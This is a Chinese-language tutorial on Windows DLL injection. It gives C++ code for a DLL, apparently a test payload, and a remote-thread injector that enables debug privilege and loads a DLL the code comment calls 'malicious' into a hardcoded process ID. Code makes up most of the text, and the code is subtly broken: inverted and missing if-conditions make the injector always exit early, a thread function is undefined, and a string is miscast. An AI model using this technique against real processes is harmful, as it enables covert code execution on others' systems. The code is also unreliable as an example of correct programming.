DLL注入的大概流程
https://uploader.shimo.im/f/CXFwwkEH6FPM0rtT.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUxNDc0MzAsImciOiJZUXRDRHBXVlJXamRKVjloIiwiaWF0IjoxNjM1MTQ3MTMwLCJ1c2VySWQiOjY5NDQ5MzgzfQ.HwHDdkHUMmhzDbU4xVTOauaQnL9Kxap6PdA19WOYoy0
DLL使用
必备函数
HINSTANCE LoadLibrary(
LPCTSTR lpLibFileName);
返回值】成功则返回模块句柄,失败返回NULL
流程
创建一个DLL项目
DLL代码
// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include<windows.h>
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH: {
MessageBox(NULL,TEXT("Hacker"),TEXT("DLL Inject"),MB_OK);
HANDLE hThread = CreateThread(NULL, 0, ThreadProc, NULL, 0, NULL);
CHAR ErrorCode[100];
sprintf(ErrorCode,"%d",(int)GetLastError());
MessageBox(NULL, (LPCWSTR)ErrorCode, TEXT("DLL Inject"), MB_OK);
if (hThread) {
MessageBox(NULL, TEXT("Success"), TEXT("DLL Inject"), MB_OK);
CloseHandle(hThread);
}
break;
}
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
通过LoadLibrary动态调用DLL
关键代码
HANDLE hModule = ::LoadLibrary("injectDll.dll");
获取DLL中的函数
FARPROC GetProcAddress(
HMODULE hModule,
LPCWSTR lpProcName);
Parameters
将模块句柄和函数名传入,成功则返回目标函数句柄,失败返回NULL
远程线程注入
必备函数
HANDLE CreateRemoteThread(
HANDLE hProcess, // handle to process
LPSECURITY_ATTRIBUTES lpThreadAttributes, // SD
SIZE_T dwStackSize, // initial stack size
LPTHREAD_START_ROUTINE lpStartAddress, // thread function
LPVOID lpParameter, // thread argument
DWORD dwCreationFlags, // creation option
LPDWORD lpThreadId // thread identifier
);
//向指定进程的指定空间写入数据
BOOL WriteProcessMemory(
HANDLE hProcess,
LPVOID lpBaseAddress,
LPVOID lpBuffer,
DWORD nSize,
LPDWORD lpNumberOfBytesWritten );
```
//在指定进程中申请一片内存
LPVOID VirtualAllocEx(
HANDLE hProcess, // process to allocate memory
LPVOID lpAddress, // desired starting address
SIZE_T dwSize, // size of region to allocate
DWORD flAllocationType, // type of allocation
DWORD flProtect // type of access protection
);
```
```
// remoteInjectDLLTEST.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include<windows.h>
#include<cstdio>
VOID ShowError(PCHAR msg)
{
printf("%s Error --Code:%d\n", msg, GetLastError());
}
BOOL InjectDll(DWORD dwPid,CHAR szDllName[]){
HANDLE hProcess = NULL,hRemoteThread = NULL;
HMODULE hKernel32 = NULL;
DWORD dwSize = 0;
LPVOID pDllPathAddr = NULL;
PVOID pLoadLibraryAddr = NULL;
BOOL bRet = FALSE;
hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwPid);
if(hProcess){
ShowError("OpenProcess");
bRet = FALSE;
goto exit;
}
//申请DLL名称的内存空间
dwSize = strlen(szDllName) + 1;
pDllPathAddr = VirtualAllocEx(hProcess,NULL,dwSize,MEM_COMMIT,PAGE_READWRITE); //在指定的进程中分配内存空间
{
ShowError("VirtualAllocEx");
bRet = FALSE;
goto exit;
}
// 把DLL完整路径名写入进程中
if (!WriteProcessMemory(hProcess, pDllPathAddr, szDllName, dwSize, NULL))
{
ShowError("WriteProcessMemory");
bRet = FALSE;
goto exit;
}
hKernel32 = LoadLibrary("Kernel32.dll");
{
ShowError("LoadLibrary");
bRet = FALSE;
goto exit;
}
// 获取LoadLibraryA函数地址
pLoadLibraryAddr = GetProcAddress(hKernel32, "LoadLibraryA");
if (pLoadLibraryAddr == NULL)
{
ShowError("GetProcAddress ");
bRet = FALSE;
goto exit;
}
//创建远程线程进行DLL注入
hRemoteThread = CreateRemoteThread(hProcess, NULL, 0,
(LPTHREAD_START_ROUTINE)pLoadLibraryAddr,
pDllPathAddr, 0, NULL);
if (hRemoteThread == NULL)
{
ShowError("CreateRemoteThread");
bRet = FALSE;
goto exit;
}
exit:
if(hKernel32) FreeLibrary(hKernel32);
if(hProcess) CloseHandle(hProcess);
if(hRemoteThread) CloseHandle(hRemoteThread);
}
void enableDebugPriv()
{
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
{
return;
}
if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue))
{
CloseHandle(hToken);
return;
}
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Luid = sedebugnameValue;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof tkp, NULL, NULL))
{
CloseHandle(hToken);
return;
}
}
int main(int argc, char* argv[])
{
enableDebugPriv(); //Inhance Privilege
InjectDll(788,"E:\\Code\\injectDll\\Release\\injectDll.dll"); //选择需要注入的进程,选中恶意DLL
return 0;
}
```
